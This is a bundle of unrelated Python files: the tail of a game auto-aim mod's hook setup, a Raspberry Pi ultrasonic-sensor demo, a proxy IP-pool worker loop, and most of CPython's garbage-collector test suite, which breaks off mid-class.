hooked_start_battle = Battle.afterCreate
hooked_stop_battle = Battle.beforeDelete
#hook
Hangar._Hangar__updateAll = hook_update_all
PlayerAvatar.autoAim = hook_auto_aim
PlayerAvatar.onAutoAimVehicleLost = hook_on_auto_aim_vehicle_lost
BattleReplay.onLockTarget = hook_on_lock_target
Battle.afterCreate = hook_start_battle
Battle.beforeDelete = hook_stop_battle
#start mod
config = Config()
config.load_mod()
autoaim_extended = AutoAim()
PlayerAvatar.autoaim_extended = Autoaim_extended()
|
sensor-threaded.py
|
#!/usr/bin/python3
"""
Program: HC-SR04 Sensor Demo (sensor-threaded.py)
Author: M. Heidenreich, (c) 2020
Description:
This code is provided in support of the following YouTube tutorial:
https://youtu.be/JvQKZXCYMUM
This example shows how to use the HC-SR04 sensor to provide a continuous
distance readout with Raspberry Pi.
This example shows how to use the LCD1602 I2C display and the HC-SR04 sensor
with Raspberry Pi using a multi-threaded approach.
THIS SOFTWARE AND LINKED VIDEO TOTORIAL ARE PROVIDED "AS IS" AND THE
AUTHOR DISCLAIMS ALL WARRANTIES INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
from signal import signal, SIGTERM, SIGHUP, pause
from time import sleep
from threading import Thread
from gpiozero import DistanceSensor
reading = True
sensor = DistanceSensor(echo=20, trigger=21)
def safe_exit(signum, frame):
exit(1)
def read_distance():
global message
while reading:
message = f"Distance: {sensor.value:1.2f} m"
print(message)
sleep(0.1)
try:
signal(SIGTERM, safe_exit)
signal(SIGHUP, safe_exit)
reader = Thread(target=read_distance, daemon=True)
reader.start()
pause()
except KeyboardInterrupt:
pass
finally:
reading = False
reader.join()
sensor.close()
|
IpAddressPoolMain1.py
|
import time
import threading
from service.IpService import testIp
from service.IpService import acquire
from service.IpService import deleteIp
import traceback
from Log import log
def main():
log.info('程序启动')
try:
threading.Thread(target=checkIpMain).start()
threading.Thread(target=updata).start()
except:
main()
def updata():
log.info('更新线程启动!!!')
while (True):
try:
acquire(1)
time.sleep(6)
except:
traceback.print_exc()
log.error("更新时有异常。。。。")
time.sleep(2)
def checkIpMain():
while True:
try:
log.info('测试线程执行!!!')
testIp()
deleteIp()
time.sleep(6)
except:
traceback.print_exc()
log.error("测试时有异常。。。。")
time.sleep(2)
if __name__ == '__main__':
main()
|
test_gc.py
|
import unittest
import unittest.mock
from test.support import (verbose, refcount_test,
cpython_only, start_threads,
temp_dir, TESTFN, unlink,
import_module)
from test.support.script_helper import assert_python_ok, make_script
import gc
import sys
import sysconfig
import textwrap
import threading
import time
import weakref
try:
from _testcapi import with_tp_del
except ImportError:
def with_tp_del(cls):
class C(object):
def __new__(cls, *args, **kwargs):
raise TypeError('requires _testcapi.with_tp_del')
return C
try:
from _testcapi import ContainerNoGC
except ImportError:
ContainerNoGC = None
### Support code
###############################################################################
# Bug 1055820 has several tests of longstanding bugs involving weakrefs and
# cyclic gc.
# An instance of C1055820 has a self-loop, so becomes cyclic trash when
# unreachable.
class C1055820(object):
def __init__(self, i):
self.i = i
self.loop = self
class GC_Detector(object):
# Create an instance I. Then gc hasn't happened again so long as
# I.gc_happened is false.
def __init__(self):
self.gc_happened = False
def it_happened(ignored):
self.gc_happened = True
# Create a piece of cyclic trash that triggers it_happened when
# gc collects it.
self.wr = weakref.ref(C1055820(666), it_happened)
@with_tp_del
class Uncollectable(object):
"""Create a reference cycle with multiple __del__ methods.
An object in a reference cycle will never have zero references,
and so must be garbage collected. If one or more objects in the
cycle have __del__ methods, the gc refuses to guess an order,
and leaves the cycle uncollected."""
def __init__(self, partner=None):
if partner is None:
self.partner = Uncollectable(partner=self)
else:
self.partner = partner
def __tp_del__(self):
pass
if sysconfig.get_config_vars().get('PY_CFLAGS', ''):
BUILD_WITH_NDEBUG = ('-DNDEBUG' in sysconfig.get_config_vars()['PY_CFLAGS'])
else:
# Usually, sys.gettotalrefcount() is only present if Python has been
# compiled in debug mode. If it's missing, expect that Python has
# been released in release mode: with NDEBUG defined.
BUILD_WITH_NDEBUG = (not hasattr(sys, 'gettotalrefcount'))
### Tests
###############################################################################
class GCTests(unittest.TestCase):
def test_list(self):
l = []
l.append(l)
gc.collect()
del l
self.assertEqual(gc.collect(), 1)
def test_dict(self):
d = {}
d[1] = d
gc.collect()
del d
self.assertEqual(gc.collect(), 1)
def test_tuple(self):
# since tuples are immutable we close the loop with a list
l = []
t = (l,)
l.append(t)
gc.collect()
del t
del l
self.assertEqual(gc.collect(), 2)
def test_class(self):
class A:
pass
A.a = A
gc.collect()
del A
self.assertNotEqual(gc.collect(), 0)
def test_newstyleclass(self):
class A(object):
pass
gc.collect()
del A
self.assertNotEqual(gc.collect(), 0)
def test_instance(self):
class A:
pass
a = A()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
def test_newinstance(self):
class A(object):
pass
a = A()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
class B(list):
pass
class C(B, A):
pass
a = C()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
del B, C
self.assertNotEqual(gc.collect(), 0)
A.a = A()
del A
self.assertNotEqual(gc.collect(), 0)
self.assertEqual(gc.collect(), 0)
def test_method(self):
# Tricky: self.__init__ is a bound method, it references the instance.
class A:
def __init__(self):
self.init = self.__init__
a = A()
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
@cpython_only
def test_legacy_finalizer(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
@with_tp_del
class A:
def __tp_del__(self): pass
class B:
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
@cpython_only
def test_legacy_finalizer_newclass(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
@with_tp_del
class A(object):
def __tp_del__(self): pass
class B(object):
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
def test_function(self):
# Tricky: f -> d -> f, code should call d.clear() after the exec to
# break the cycle.
d = {}
exec("def f(): pass\n", d)
gc.collect()
del d
self.assertEqual(gc.collect(), 2)
@refcount_test
def test_frame(self):
def f():
frame = sys._getframe()
gc.collect()
f()
self.assertEqual(gc.collect(), 1)
def test_saveall(self):
# Verify that cyclic garbage like lists show up in gc.garbage if the
# SAVEALL option is enabled.
# First make sure we don't save away other stuff that just happens to
# be waiting for collection.
gc.collect()
# if this fails, someone else created immortal trash
self.assertEqual(gc.garbage, [])
L = []
L.append(L)
id_L = id(L)
debug = gc.get_debug()
gc.set_debug(debug | gc.DEBUG_SAVEALL)
del L
gc.collect()
gc.set_debug(debug)
self.assertEqual(len(gc.garbage), 1)
obj = gc.garbage.pop()
self.assertEqual(id(obj), id_L)
def test_del(self):
# __del__ methods can trigger collection, make this to happen
thresholds = gc.get_threshold()
gc.enable()
gc.set_threshold(1)
class A:
def __del__(self):
dir(self)
a = A()
del a
gc.disable()
gc.set_threshold(*thresholds)
def test_del_newclass(self):
# __del__ methods can trigger collection, make this to happen
thresholds = gc.get_threshold()
gc.enable()
gc.set_threshold(1)
class A(object):
def __del__(self):
dir(self)
a = A()
del a
gc.disable()
gc.set_threshold(*thresholds)
# The following two tests are fragile:
# They precisely count the number of allocations,
# which is highly implementation-dependent.
# For example, disposed tuples are not freed, but reused.
# To minimize variations, though, we first store the get_count() results
# and check them at the end.
@refcount_test
def test_get_count(self):
gc.collect()
a, b, c = gc.get_count()
x = []
d, e, f = gc.get_count()
self.assertEqual((b, c), (0, 0))
self.assertEqual((e, f), (0, 0))
# This is less fragile than asserting that a equals 0.
self.assertLess(a, 5)
# Between the two calls to get_count(), at least one object was
# created (the list).
self.assertGreater(d, a)
@refcount_test
def test_collect_generations(self):
gc.collect()
# This object will "trickle" into generation N + 1 after
# each call to collect(N)
x = []
gc.collect(0)
# x is now in gen 1
a, b, c = gc.get_count()
gc.collect(1)
# x is now in gen 2
d, e, f = gc.get_count()
gc.collect(2)
# x is now in gen 3
g, h, i = gc.get_count()
# We don't check a, d, g since their exact values depends on
# internal implementation details of the interpreter.
self.assertEqual((b, c), (1, 0))
self.assertEqual((e, f), (0, 1))
self.assertEqual((h, i), (0, 0))
def test_trashcan(self):
class Ouch:
n = 0
def __del__(self):
Ouch.n = Ouch.n + 1
if Ouch.n % 17 == 0:
gc.collect()
# "trashcan" is a hack to prevent stack overflow when deallocating
# very deeply nested tuples etc. It works in part by abusing the
# type pointer and refcount fields, and that can yield horrible
# problems when gc tries to traverse the structures.
# If this test fails (as it does in 2.0, 2.1 and 2.2), it will
# most likely die via segfault.
# Note: In 2.3 the possibility for compiling without cyclic gc was
# removed, and that in turn allows the trashcan mechanism to work
# via much simpler means (e.g., it never abuses the type pointer or
# refcount fields anymore). Since it's much less likely to cause a
# problem now, the various constants in this expensive (we force a lot
# of full collections) test are cut back from the 2.2 version.
gc.enable()
N = 150
for count in range(2):
t = []
for i in range(N):
t = [t, Ouch()]
u = []
for i in range(N):
u = [u, Ouch()]
v = {}
for i in range(N):
v = {1: v, 2: Ouch()}
gc.disable()
def test_trashcan_threads(self):
# Issue #13992: trashcan mechanism should be thread-safe
NESTING = 60
N_THREADS = 2
def sleeper_gen():
"""A generator that releases the GIL when closed or dealloc'ed."""
try:
yield
finally:
time.sleep(0.000001)
class C(list):
# Appending to a list is atomic, which avoids the use of a lock.
inits = []
dels = []
def __init__(self, alist):
self[:] = alist
C.inits.append(None)
def __del__(self):
# This __del__ is called by subtype_dealloc().
C.dels.append(None)
# `g` will release the GIL when garbage-collected. This
# helps assert subtype_dealloc's behaviour when threads
# switch in the middle of it.
g = sleeper_gen()
next(g)
# Now that __del__ is finished, subtype_dealloc will proceed
# to call list_dealloc, which also uses the trashcan mechanism.
def make_nested():
"""Create a sufficiently nested container object so that the
trashcan mechanism is invoked when deallocating it."""
x = C([])
for i in range(NESTING):
x = [C([x])]
del x
def run_thread():
"""Exercise make_nested() in a loop."""
while not exit:
make_nested()
old_switchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-5)
try:
exit = []
threads = []
for i in range(N_THREADS):
t = threading.Thread(target=run_thread)
threads.append(t)
with start_threads(threads, lambda: exit.append(1)):
time.sleep(1.0)
finally:
sys.setswitchinterval(old_switchinterval)
gc.collect()
self.assertEqual(len(C.inits), len(C.dels))
def test_boom(self):
class Boom:
def __getattr__(self, someattribute):
del self.attr
raise AttributeError
a = Boom()
b = Boom()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
# a<->b are in a trash cycle now. Collection will invoke
# Boom.__getattr__ (to see whether a and b have __del__ methods), and
# __getattr__ deletes the internal "attr" attributes as a side effect.
# That causes the trash cycle to get reclaimed via refcounts falling to
# 0, thus mutating the trash graph as a side effect of merely asking
# whether __del__ exists. This used to (before 2.3b1) crash Python.
# Now __getattr__ isn't called.
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom2(self):
class Boom2:
def __init__(self):
self.x = 0
def __getattr__(self, someattribute):
self.x += 1
if self.x > 1:
del self.attr
raise AttributeError
a = Boom2()
b = Boom2()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
# Much like test_boom(), except that __getattr__ doesn't break the
# cycle until the second time gc checks for __del__. As of 2.3b1,
# there isn't a second time, so this simply cleans up the trash cycle.
# We expect a, b, a.__dict__ and b.__dict__ (4 objects) to get
# reclaimed this way.
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom_new(self):
# boom__new and boom2_new are exactly like boom and boom2, except use
# new-style classes.
class Boom_New(object):
def __getattr__(self, someattribute):
del self.attr
raise AttributeError
a = Boom_New()
b = Boom_New()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom2_new(self):
class Boom2_New(object):
def __init__(self):
self.x = 0
def __getattr__(self, someattribute):
self.x += 1
if self.x > 1:
del self.attr
raise AttributeError
a = Boom2_New()
b = Boom2_New()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_get_referents(self):
alist = [1, 3, 5]
got = gc.get_referents(alist)
got.sort()
self.assertEqual(got, alist)
atuple = tuple(alist)
got = gc.get_referents(atuple)
got.sort()
self.assertEqual(got, alist)
adict = {1: 3, 5: 7}
expected = [1, 3, 5, 7]
got = gc.get_referents(adict)
got.sort()
self.assertEqual(got, expected)
got = gc.get_referents([1, 2], {3: 4}, (0, 0, 0))
got.sort()
self.assertEqual(got, [0, 0] + list(range(5)))
self.assertEqual(gc.get_referents(1, 'a', 4j), [])
def test_is_tracked(self):
# Atomic built-in types are not tracked, user-defined objects and
# mutable containers are.
# NOTE: types with special optimizations (e.g. tuple) have tests
# in their own test files instead.
self.assertFalse(gc.is_tracked(None))
self.assertFalse(gc.is_tracked(1))
self.assertFalse(gc.is_tracked(1.0))
self.assertFalse(gc.is_tracked(1.0 + 5.0j))
self.assertFalse(gc.is_tracked(True))
self.assertFalse(gc.is_tracked(False))
self.assertFalse(gc.is_tracked(b"a"))
self.assertFalse(gc.is_tracked("a"))
self.assertFalse(gc.is_tracked(bytearray(b"a")))
self.assertFalse(gc.is_tracked(type))
self.assertFalse(gc.is_tracked(int))
self.assertFalse(gc.is_tracked(object))
self.assertFalse(gc.is_tracked(object()))
class UserClass:
pass
class UserInt(int):
pass
# Base class is object; no extra fields.
class UserClassSlots:
__slots__ = ()
# Base class is fixed size larger than object; no extra fields.
class UserFloatSlots(float):
__slots__ = ()
# Base class is variable size; no extra fields.
class UserIntSlots(int):
__slots__ = ()
self.assertTrue(gc.is_tracked(gc))
self.assertTrue(gc.is_tracked(UserClass))
self.assertTrue(gc.is_tracked(UserClass()))
self.assertTrue(gc.is_tracked(UserInt()))
self.assertTrue(gc.is_tracked([]))
self.assertTrue(gc.is_tracked(set()))
self.assertTrue(gc.is_tracked(UserClassSlots()))
self.assertTrue(gc.is_tracked(UserFloatSlots()))
self.assertTrue(gc.is_tracked(UserIntSlots()))
def test_is_finalized(self):
# Objects not tracked by the always gc return false
self.assertFalse(gc.is_finalized(3))
storage = []
class Lazarus:
def __del__(self):
storage.append(self)
lazarus = Lazarus()
self.assertFalse(gc.is_finalized(lazarus))
del lazarus
gc.collect()
lazarus = storage.pop()
self.assertTrue(gc.is_finalized(lazarus))
def test_bug1055820b(self):
# Corresponds to temp2b.py in the bug report.
ouch = []
def callback(ignored):
ouch[:] = [wr() for wr in WRs]
Cs = [C1055820(i) for i in range(2)]
WRs = [weakref.ref(c, callback) for c in Cs]
c = None
gc.collect()
self.assertEqual(len(ouch), 0)
# Make the two instances trash, and collect again. The bug was that
# the callback materialized a strong reference to an instance, but gc
# cleared the instance's dict anyway.
Cs = None
gc.collect()
self.assertEqual(len(ouch), 2) # else the callbacks didn't run
for x in ouch:
# If the callback resurrected one of these guys, the instance
# would be damaged, with an empty __dict__.
self.assertEqual(x, None)
def test_bug21435(self):
# This is a poor test - its only virtue is that it happened to
# segfault on Tim's Windows box before the patch for 21435 was
# applied. That's a nasty bug relying on specific pieces of cyclic
# trash appearing in exactly the right order in finalize_garbage()'s
# input list.
# But there's no reliable way to force that order from Python code,
# so over time chances are good this test won't really be testing much
# of anything anymore. Still, if it blows up, there's _some_
# problem ;-)
gc.collect()
class A:
pass
class B:
def __init__(self, x):
self.x = x
def __del__(self):
self.attr = None
def do_work():
a = A()
b = B(A())
a.attr = b
b.attr = a
do_work()
gc.collect() # this blows up (bad C pointer) when it fails
@cpython_only
def test_garbage_at_shutdown(self):
import subprocess
code = """if 1:
import gc
import _testcapi
@_testcapi.with_tp_del
class X:
def __init__(self, name):
self.name = name
def __repr__(self):
return "<X %%r>" %% self.name
def __tp_del__(self):
pass
x = X('first')
x.x = x
x.y = X('second')
del x
gc.set_debug(%s)
"""
def run_command(code):
p = subprocess.Popen([sys.executable, "-Wd", "-c", code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
p.stdout.close()
p.stderr.close()
self.assertEqual(p.returncode, 0)
self.assertEqual(stdout, b"")
return stderr
stderr = run_command(code % "0")
self.assertIn(b"ResourceWarning: gc: 2 uncollectable objects at "
b"shutdown; use", stderr)
self.assertNotIn(b"<X 'first'>", stderr)
# With DEBUG_UNCOLLECTABLE, the garbage list gets printed
stderr = run_command(code % "gc.DEBUG_UNCOLLECTABLE")
self.assertIn(b"ResourceWarning: gc: 2 uncollectable objects at "
b"shutdown", stderr)
self.assertTrue(
(b"[<X 'first'>, <X 'second'>]" in stderr) or
(b"[<X 'second'>, <X 'first'>]" in stderr), stderr)
# With DEBUG_SAVEALL, no additional message should get printed
# (because gc.garbage also contains normally reclaimable cyclic
# references, and its elements get printed at runtime anyway).
stderr = run_command(code % "gc.DEBUG_SAVEALL")
self.assertNotIn(b"uncollectable objects at shutdown", stderr)
def test_gc_main_module_at_shutdown(self):
# Create a reference cycle through the __main__ module and check
# it gets collected at interpreter shutdown.
code = """if 1:
class C:
def __del__(self):
print('__del__ called')
l = [C()]
l.append(l)
"""
rc, out, err = assert_python_ok('-c', code)
self.assertEqual(out.strip(), b'__del__ called')
def test_gc_ordinary_module_at_shutdown(self):
# Same as above, but with a non-__main__ module.
with temp_dir() as script_dir:
module = """if 1:
class C:
def __del__(self):
print('__del__ called')
l = [C()]
l.append(l)
"""
code = """if 1:
import sys
sys.path.insert(0, %r)
import gctest
""" % (script_dir,)
make_script(script_dir, 'gctest', module)
rc, out, err = assert_python_ok('-c', code)
self.assertEqual(out.strip(), b'__del__ called')
def test_global_del_SystemExit(self):
code = """if 1:
class ClassWithDel:
def __del__(self):
print('__del__ called')
a = ClassWithDel()
a.link = a
raise SystemExit(0)"""
self.addCleanup(unlink, TESTFN)
with open(TESTFN, 'w') as script:
script.write(code)
rc, out, err = assert_python_ok(TESTFN)
self.assertEqual(out.strip(), b'__del__ called')
def test_get_stats(self):
stats = gc.get_stats()
self.assertEqual(len(stats), 3)
for st in stats:
self.assertIsInstance(st, dict)
self.assertEqual(set(st),
{"collected", "collections", "uncollectable"})
self.assertGreaterEqual(st["collected"], 0)
self.assertGreaterEqual(st["collections"], 0)
self.assertGreaterEqual(st["uncollectable"], 0)
# Check that collection counts are incremented correctly
if gc.isenabled():
self.addCleanup(gc.enable)
gc.disable()
old = gc.get_stats()
gc.collect(0)
new = gc.get_stats()
self.assertEqual(new[0]["collections"], old[0]["collections"] + 1)
self.assertEqual(new[1]["collections"], old[1]["collections"])
self.assertEqual(new[2]["collections"], old[2]["collections"])
gc.collect(2)
new = gc.get_stats()
self.assertEqual(new[0]["collections"], old[0]["collections"] + 1)
self.assertEqual(new[1]["collections"], old[1]["collections"])
self.assertEqual(new[2]["collections"], old[2]["collections"] + 1)
def test_freeze(self):
gc.freeze()
self.assertGreater(gc.get_freeze_count(), 0)
gc.unfreeze()
self.assertEqual(gc.get_freeze_count(), 0)
def test_get_objects(self):
gc.collect()
l = []
l.append(l)
self.assertTrue(
any(l is element for element in gc.get_objects(generation=0))
)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=1))
)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=2))
)
gc.collect(generation=0)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=0))
)
self.assertTrue(
any(l is element for element in gc.get_objects(generation=1))
)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=2))
)
gc.collect(generation=1)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=0))
)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=1))
)
self.assertTrue(
any(l is element for element in gc.get_objects(generation=2))
)
gc.collect(generation=2)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=0))
)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=1))
)
self.assertTrue(
any(l is element for element in gc.get_objects(generation=2))
)
del l
gc.collect()
def test_get_objects_arguments(self):
gc.collect()
self.assertEqual(len(gc.get_objects()),
len(gc.get_objects(generation=None)))
self.assertRaises(ValueError, gc.get_objects, 1000)
self.assertRaises(ValueError, gc.get_objects, -1000)
self.assertRaises(TypeError, gc.get_objects, "1")
self.assertRaises(TypeError, gc.get_objects, 1.234)
def test_resurrection_only_happens_once_per_object(self):
class A: # simple self-loop
def __init__(self):
self.me = self
class Lazarus(A):
resurrected = 0
resurrected_instances = []
def __del__(self):
Lazarus.resurrected += 1
Lazarus.resurrected_instances.append(self)
gc.collect()
gc.disable()
# We start with 0 resurrections
laz = Lazarus()
self.assertEqual(Lazarus.resurrected, 0)
# Deleting the instance and triggering a collection
# resurrects the object
del laz
gc.collect()
self.assertEqual(Lazarus.resurrected, 1)
self.assertEqual(len(Lazarus.resurrected_instances), 1)
# Clearing the references and forcing a collection
# should not resurrect the object again.
Lazarus.resurrected_instances.clear()
self.assertEqual(Lazarus.resurrected, 1)
gc.collect()
self.assertEqual(Lazarus.resurrected, 1)
gc.enable()
def test_resurrection_is_transitive(self):
class Cargo:
def __init__(self):
self.me = self
class Lazarus:
resurrected_instances = []
def __del__(self):
Lazarus.resurrected_instances.append(self)
gc.collect()
gc.disable()
laz = Lazarus()
cargo = Cargo()
cargo_id = id(cargo)
# Create a cycle between cargo and laz
laz.cargo = cargo
cargo.laz = laz
# Drop the references, force a collection and check that
# everything was resurrected.
del laz, cargo
gc.collect()
self.assertEqual(len(Lazarus.resurrected_instances), 1)
instance = Lazarus.resurrected_instances.pop()
self.assertTrue(hasattr(instance, "cargo"))
self.assertEqual(id(instance.cargo), cargo_id)
gc.collect()
gc.enable()
def test_resurrection_does_not_block_cleanup_of_other_objects(self):
# When a finalizer resurrects objects, stats were reporting them as
# having been collected. This affected both collect()'s return
# value and the dicts returned by get_stats().
N = 100
class A: # simple self-loop
def __init__(self):
self.me = self
class Z(A): # resurrecting __del__
def __del__(self):
zs.append(self)
zs = []
def getstats():
d = gc.get_stats()[-1]
return d['collected'], d['uncollectable']
gc.collect()
gc.disable()
# No problems if just collecting A() instances.
oldc, oldnc = getstats()
for i in range(N):
A()
t = gc.collect()
c, nc = getstats()
self.assertEqual(t, 2*N) # instance object & its dict
self.assertEqual(c - oldc, 2*N)
self.assertEqual(nc - oldnc, 0)
# But Z() is not actually collected.
oldc, oldnc = c, nc
Z()
# Nothing is collected - Z() is merely resurrected.
t = gc.collect()
c, nc = getstats()
self.assertEqual(t, 0)
self.assertEqual(c - oldc, 0)
self.assertEqual(nc - oldnc, 0)
# Z() should not prevent anything else from being collected.
oldc, oldnc = c, nc
for i in range(N):
A()
Z()
t = gc.collect()
c, nc = getstats()
self.assertEqual(t, 2*N)
self.assertEqual(c - oldc, 2*N)
self.assertEqual(nc - oldnc, 0)
# The A() trash should have been reclaimed already but the
# 2 copies of Z are still in zs (and the associated dicts).
oldc, oldnc = c, nc
zs.clear()
t = gc.collect()
c, nc = getstats()
self.assertEqual(t, 4)
self.assertEqual(c - oldc, 4)
self.assertEqual(nc - oldnc, 0)
gc.enable()
@unittest.skipIf(ContainerNoGC is None,
'requires ContainerNoGC extension type')
def test_trash_weakref_clear(self):
# Test that trash weakrefs are properly cleared (bpo-38006).
#
# Structure we are creating:
#
# Z <- Y <- A--+--> WZ -> C
# ^ |
# +--+
# where:
# WZ is a weakref to Z with callback C
# Y doesn't implement tp_traverse
# A contains a reference to itself, Y and WZ
#
# A, Y, Z, WZ are all trash. The GC doesn't know that Z is trash
# because Y does not implement tp_traverse. To show the bug, WZ needs
# to live long enough so that Z is deallocated before it. Then, if
# gcmodule is buggy, when Z is being deallocated, C will run.
#
# To ensure WZ lives long enough, we put it in a second reference
# cycle. That trick only works due to the ordering of the GC prev/next
# linked lists. So, this test is a bit fragile.
#
# The bug reported in bpo-38006 is caused because the GC did not
# clear WZ before starting the process of calling tp_clear on the
# trash. Normally, handle_weakrefs() would find the weakref via Z and
# clear it. However, since the GC cannot find Z, WR is not cleared and
# it can execute during delete_garbage(). That can lead to disaster
# since the callback might tinker with objects that have already had
# tp_clear called on them (leaving them in possibly invalid states).
callback = unittest.mock.Mock()
class A:
__slots__ = ['a', 'y', 'wz']
class Z:
pass
# setup required object graph, as described above
a = A()
a.a = a
a.y = ContainerNoGC(Z())
a.wz = weakref.ref(a.y.value, callback)
# create second cycle to keep WZ alive longer
wr_cycle = [a.wz]
wr_cycle.append(wr_cycle)
# ensure trash unrelated to this test is gone
gc.collect()
gc.disable()
# release references and create trash
del a, wr_cycle
gc.collect()
# if called, it means there is a bug in the GC. The weakref should be
# cleared before Z dies.
callback.assert_not_called()
gc.enable()
class GCCallbackTests(unittest.TestCase):
def setUp(self):
# Save gc state and disable it.
self.enabled = gc.isenabled()
gc.disable()
self.debug = gc.get_debug()
gc.set_debug(0)
gc.callbacks.append(self.cb1)
gc.callbacks.append(self.cb2)
self.othergarbage = []
def tearDown(self):
# Restore gc state
del self.visit
gc.callbacks.remove(self.cb1)
gc.callbacks.remove(self.cb2)
gc.set_debug(self.debug)
if self.enabled:
gc.enable()
# destroy any uncollectables
gc.collect()
for obj in gc.garbage:
if isinstance(obj, Uncollectable):
obj.partner = None
del gc.garbage[:]
del self.othergarbage
gc.collect()
def preclean(self):
# Remove all fluff from the system. Invoke this function
# manually rather than through self.setUp() for maximum
# safety.
self.visit = []
gc.collect()
garbage, gc.garbage[:] = gc.garbage[:], []
self.othergarbage.append(garbage)
self.visit = []
def cb1(self, phase, info):
self.visit.append((1, phase, dict(info)))
def cb2(self, phase, info):
self.visit.append((2, phase, dict(info)))
if phase == "stop" and hasattr(self, "cleanup"):
# Clean Uncollectable from garbage
uc = [e for e in gc.garbage if isinstance(e, Uncollectable)]
gc.garbage[:] = [e for e in gc.garbage
if not isinstance(e, Uncollectable)]
for e in uc:
e.partner = None
def test_collect(self):
self.preclean()
gc.collect()
# Algorithmically verify the contents of self.visit
# because it is long and tortuous.
# Count the number of visits to each callback
n = [v[0] for v in self.visit]
n1 = [i for i in n if i == 1]
n2 = [i for i in n if i == 2]
self.assertEqual(n1, [1]*2)
self.assertEqual(n2, [2]*2)
# Count that we got the right number of start and stop callbacks.
n = [v[1] for v in self.visit]
n1 = [i for i in n if i == "start"]
n2 = [i for i in n if i == "stop"]
self.assertEqual(n1, ["start"]*2)
self.assertEqual(n2, ["stop"]*2)
# Check that we got the right info dict for all callbacks
for v in self.visit:
info = v[2]
self.assertTrue("generation" in info)
self.assertTrue("collected" in info)
self.assertTrue("uncollectable" in info)
def test_collect_generation(self):
self.preclean()
gc.collect(2)
for v in self.visit:
info = v[2]
self.assertEqual(info["generation"], 2)
@cpython_only
def test_collect_garbage(self):
self.preclean()
# Each of these cause four objects to be garbage: Two
# Uncollectables and their instance dicts.
Uncollectable()
Uncollectable()
C1055820(666)
gc.collect()
for v in self.visit:
if v[1] != "stop":
continue
info = v[2]
self.assertEqual(info["collected"], 2)
self.assertEqual(info["uncollectable"], 8)
# We should now have the Uncollectables in gc.garbage
self.assertEqual(len(gc.garbage), 4)
for e in gc.garbage:
self.assertIsInstance(e, Uncollectable)
# Now, let our callback handle the Uncollectable instances
self.cleanup=True
self.visit = []
gc.garbage[:] = []
gc.collect()
for v in self.visit:
if v[1] != "stop":
continue
info = v[2]
self.assertEqual(info["collected"], 0)
self.assertEqual(info["uncollectable"], 4)
# Uncollectables should be gone
self.assertEqual(len(gc.garbage), 0)
@unittest.skipIf(BUILD_WITH_NDEBUG,
'built with -NDEBUG')
def test_refcount_errors(self):
self.preclean()
# Verify the "handling" of objects with broken refcounts
# Skip the test if ctypes is not available
import_module("ctypes")
import subprocess
code = textwrap.dedent('''
from test.support import gc_collect, SuppressCrashReport
a = [1, 2, 3]
b = [a]
# Avoid coredump when Py_FatalError() calls abort()
SuppressCrashReport().__enter__()
# Simulate the refcount of "a" being too low (compared to the
# references held on it by live data), but keeping it above zero
# (to avoid deallocating it):
import ctypes
ctypes.pythonapi.Py_DecRef(ctypes.py_object(a))
# The garbage collector should now have a fatal error
# when it reaches the broken object
gc_collect()
''')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
p.stdout.close()
p.stderr.close()
# Verify that stderr has a useful error message:
self.assertRegex(stderr,
br'gcmodule\.c:[0-9]+: gc_decref: Assertion "gc_get_refs\(g\) > 0" failed.')
self.assertRegex(stderr,
br'refcount is too small')
# "address : 0x7fb5062efc18"
# "address : 7FB5062EFC18"
address_regex = br'[0-9a-fA-Fx]+'
self.assertRegex(stderr,
br'object address : ' + address_regex)
self.assertRegex(stderr,
br'object refcount : 1')
self.assertRegex(stderr,
br'object type : ' + address_regex)
self.assertRegex(stderr,
br'object type name: list')
self.assertRegex(stderr,
br'object repr : \[1, 2, 3\]')
class GCTogglingTests(unittest.TestCase):
def setUp(self):
gc.enable()
